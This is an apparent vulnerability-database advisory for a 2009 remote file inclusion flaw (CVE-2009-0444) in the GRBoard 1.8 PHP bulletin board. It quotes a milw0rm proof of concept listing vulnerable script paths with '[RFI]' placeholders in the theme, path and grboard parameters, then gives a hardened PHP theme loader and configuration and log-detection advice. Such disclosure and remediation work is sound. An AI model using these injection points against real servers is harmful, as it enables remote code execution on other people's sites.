Sirini GR Board Multiple Remote File Inclusion Vulnerabilities

Vulnerability ID: 1117351    Vulnerability type: Code injection
Published: 2009-02-04    Updated: 2009-03-06
CVE: CVE-2009-0444    CNNVD-ID: CNNVD-200902-212
Platform: PHP    CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/7979
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-212
|Vulnerability details
GRBoard 1.8 contains multiple PHP remote file inclusion vulnerabilities. When register_globals is enabled and magic_quotes_gpc is disabled, a remote attacker can execute arbitrary PHP code via a URL in the theme parameter to (a) 179_squarebox_pds_list/view.php, (b) 179_squarebox_minishop_expand/view.php, (c) 179_squarebox_gallery_list_pds/view.php, (d) 179_squarebox_gallery_list/view.php, (e) 179_squarebox_gallery/view.php, (f) 179_squarebox_board_swfupload/view.php, (g) 179_squarebox_board_expand/view.php, (h) 179_squarebox_board_basic_with_grcode/view.php, (i) 179_squarebox_board_basic/view.php, (j) 179_simplebar_pds_list/view.php, (k) 179_simplebar_notice/view.php, (l) 179_simplebar_gallery_list_pds/view.php, (m) 179_simplebar_gallery/view.php and (n) 179_simplebar_basic/view.php under theme/; via a URL in the path parameter to latest/sirini_gallery_latest/list.php; and via a URL in the grboard parameter to (p) include.php and (q) form_mail.php.
|Exploit
GRBoard 1.8 Remote File Inclusion Vulnerability
bY make0day@gmail.com

/*************************

GRBoard (VERSION 1.8) is a bulletin board system from Korea.
It is freely available for all platforms that support PHP and MySQL.
But I found a Remote File Inclusion vulnerability.
Here is the details:

**************************/
TEST ON VERSION GRBoard 1.8 
Download : http://sirini.net/v22/?get=grboard
/***************************
Remote File Inclusion Vulnerability

/form_mail.php

include $grboard.'/db_info.php'; //File Include

*************************/

poc:

/theme/179_squarebox_pds_list/view.php?theme=[RFI]
/theme/179_squarebox_minishop_expand/view.php?theme=[RFI]
/theme/179_squarebox_gallery_list_pds/view.php?theme=[RFI]
/theme/179_squarebox_gallery_list/view.php?theme=[RFI]
/theme/179_squarebox_gallery/view.php?theme=[RFI]
/theme/179_squarebox_board_swfupload/view.php?theme=[RFI]
/theme/179_squarebox_board_expand/view.php?theme=[RFI]
/theme/179_squarebox_board_basic_with_grcode/view.php?theme=[RFI]
/theme/179_squarebox_board_basic/view.php?theme=[RFI]
/theme/179_simplebar_pds_list/view.php?theme=[RFI]
/theme/179_simplebar_notice/view.php?theme=[RFI]
/theme/179_simplebar_gallery_list_pds/view.php?theme=[RFI]
/theme/179_simplebar_gallery/view.php?theme=[RFI]
/theme/179_simplebar_basic/view.php?theme=[RFI]
/latest/sirini_gallery_latest/list.php?path=[RFI]
/include.php?grboard=[RFI]

# milw0rm.com [2009-02-04]
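A hardened counterpart to the `include $grboard.'/db_info.php'` and `theme` includes above, added here as an example; it is not GRBoard code and not part of the advisory. The theme directory name, the default theme and the request handling are assumptions for illustration.

```php
<?php
// Added example (not GRBoard code): a theme loader that cannot be turned into a
// remote or local file inclusion. The root cause on this page is that a request
// variable ($theme, $grboard, $path) is concatenated straight into include.
declare(strict_types=1);

const THEME_DIR = __DIR__ . '/theme';   // assumed install layout

// The install path used by include.php / form_mail.php is configuration, not
// input: define it once and never read it from $_GET/$_POST/register_globals.
$grboard = __DIR__;

/**
 * Map a user-supplied theme name to a file under THEME_DIR, or return null.
 * A strict allowlist of characters means "http://", "ftp://", "../", null
 * bytes and "php://" wrappers are rejected before include ever sees them.
 */
function resolve_theme_file(string $theme, string $file = 'view.php'): ?string
{
    // 1. Syntactic allowlist: a plain directory name only.
    if (!preg_match('/^[A-Za-z0-9_]{1,64}$/', $theme)) {
        return null;
    }
    // 2. Canonicalise and confirm the target still lies inside THEME_DIR
    //    (defence in depth against symlinks or a misconfigured THEME_DIR).
    $base = realpath(THEME_DIR);
    $path = realpath(THEME_DIR . '/' . $theme . '/' . $file);
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Explicit request handling replaces the register_globals variable the
// advisory relies on; the default theme name is an assumption.
$requested = $_GET['theme'] ?? '179_simplebar_basic';
$target = resolve_theme_file($requested);
if ($target === null) {
    http_response_code(400);
    exit('invalid theme');
}
include $target;
```

Independently of the code fix, `allow_url_include=Off` and `register_globals=Off` in php.ini remove the preconditions the advisory depends on, and a web server log search for `theme=`, `path=` or `grboard=` values beginning with a URL scheme is a cheap detection for attempts against an unpatched install.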
|References

Source: BID
Name: 33602
Link: http://www.securityfocus.com/bid/33602
Source: MILW0RM
Name: 7979
Link: http://www.milw0rm.com/exploits/7979
Source: SECUNIA
Name: 33812
Link: http://secunia.com/advisories/33812